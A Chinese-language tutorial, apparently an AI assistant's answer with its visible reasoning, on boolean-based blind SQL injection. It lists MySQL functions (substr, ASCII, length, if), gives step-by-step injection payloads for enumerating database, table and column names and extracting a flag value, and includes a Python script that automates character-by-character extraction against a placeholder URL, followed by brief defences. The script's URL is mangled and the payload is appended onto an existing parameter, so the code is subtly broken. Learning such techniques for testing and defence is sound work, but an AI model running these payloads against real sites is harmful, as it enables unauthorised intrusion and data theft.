布尔盲注函数大全

<think>好的，用户想了解布尔盲注的实现方式、相关函数和示例。首先，我需要回顾布尔盲注的基本概念。根据引用[1]，布尔盲注是通过构造SQL语句的布尔条件，根据页面响应判断真假来获取数据库信息。常见的函数包括字符串处理函数如substr()、ASCII()，以及条件判断函数如length()、if()。 接下来要整理实现步骤。布尔盲注通常分为确定注入点、获取数据库名、表名、字段名和数据这几个阶段。比如，在确定注入点时，用户可能会使用类似1' and 1=1-- 和1' and 1=2--来观察页面变化，确认是否存在注入漏洞。 然后需要列举常用的函数。例如，substr()用于截取字符串，ASCII()转换字符为ASCII码，length()确定字符串长度，if()进行条件判断。这些函数在构造布尔条件时非常关键。例如，使用substr(database(),1,1)可以逐个字符猜解数据库名。 示例部分，用户可能需要具体的SQL语句来说明如何应用这些函数。比如，获取数据库名的第一个字符可以使用：1' and ASCII(substr(database(),1,1))=99--，如果页面正常返回，说明ASCII码正确。这个过程需要循环遍历每个字符的位置和可能的ASCII值。 此外，用户可能对自动化工具或脚本感兴趣，比如引用[3]提到的Python脚本，通过发送HTTP请求自动化猜解过程。这部分需要简要说明脚本的逻辑，比如循环遍历字符位置和ASCII码，根据响应判断是否正确。 还需要注意引用[2]中的示例，比如使用count(column_name)来猜测表的列数。这展示了布尔盲注如何通过条件判断来推断数据库结构信息。 最后，用户可能关心如何防御布尔盲注，所以需要补充防御措施，如参数化查询和输入过滤。同时，生成相关问题可以帮助用户进一步学习，例如如何优化盲注脚本或布尔盲注的局限性。 总结起来，回答的结构应包含布尔盲注的原理、实现步骤、常用函数、具体示例、自动化脚本示例以及防御方法，确保信息准确并引用相关资料支持。</think>### 布尔盲注实现方式及技术细节 #### 1. **布尔盲注原理** 布尔盲注通过构造SQL语句的布尔条件，根据页面响应差异（如内容显示/隐藏、状态码变化）推断数据库信息。其核心在于利用条件语句（如`AND`/`OR`）的真假结果[^1]。 --- #### 2. **关键函数及作用** | 函数/语法 | 作用 | |---------------------|----------------------------------------------------------------------| | `substr(str, pos, len)` | 截取字符串`str`从位置`pos`开始的`len`个字符，例如`substr(database(),1,1)`截取数据库名的第一个字符[^2]。 | | `ASCII(char)` | 返回字符的ASCII码值，用于将字符转换为可比较的数字，如`ASCII('a')=97`。 | | `length(str)` | 返回字符串长度，用于推测数据库名、表名等长度，如`length(database())=4`。 | | `if(condition, A, B)` | 条件判断，若`condition`为真则返回A，否则返回B，如`if(1=1, sleep(2), 0)`。 | --- #### 3. **实现步骤** 1. **确定注入点** 通过构造布尔条件验证页面响应差异，例如： - `1' AND 1=1--`（页面正常） - `1' AND 1=2--`（页面异常） 若两次响应不同，则存在布尔盲注漏洞[^1]。 2. **获取数据库名** - 猜测数据库名长度： ```sql 1' AND (length(database())=4)-- ``` 若页面正常，则数据库名长度为4。 - 逐字符猜解： ```sql 1' AND ASCII(substr(database(),1,1))=99-- ``` 若页面正常，则数据库名第一个字符的ASCII码为99（即字母`c`）。 3. **获取表名和字段名** - 猜解表名长度： ```sql 1' AND (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)=5-- ``` - 枚举表名字符： ```sql 1' AND ASCII(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=102-- ``` 若成功，则第一个表名的首字母为`f`（ASCII码102）[^2]。 4. **提取数据** - 猜解字段值： ```sql 1' AND (select count(*) from flag where substr(flag_column,1,1)='C')=1-- ``` 若页面正常，则字段`flag_column`的首字符为`C`。 --- #### 4. **示例脚本（Python）** 以下脚本通过布尔盲注自动化猜解数据库名： ```python import requests url = "http://example.com/vuln_page?id=1" database = "" for i in range(1, 10): # 假设数据库名长度不超过9 for char in range(32, 127): # ASCII可打印字符范围 payload = f"1' AND ASCII(substr(database(),{i},1))={char}-- " response = requests.get(url + payload) if "Welcome" in response.text: # 假设页面包含"Welcome"表示条件为真 database += chr(char) break print("Database name:", database) ``` 脚本通过遍历字符位置和ASCII码，根据页面关键词判断条件真假[^3]。 --- #### 5. **防御措施** - **参数化查询**：使用预编译语句（如`PreparedStatement`）避免SQL拼接。 - **输入过滤**：对用户输入的特殊字符（如`'`、`"`、`#`）进行转义或过滤。 - **错误信息隐藏**：避免直接返回数据库错误细节。 ---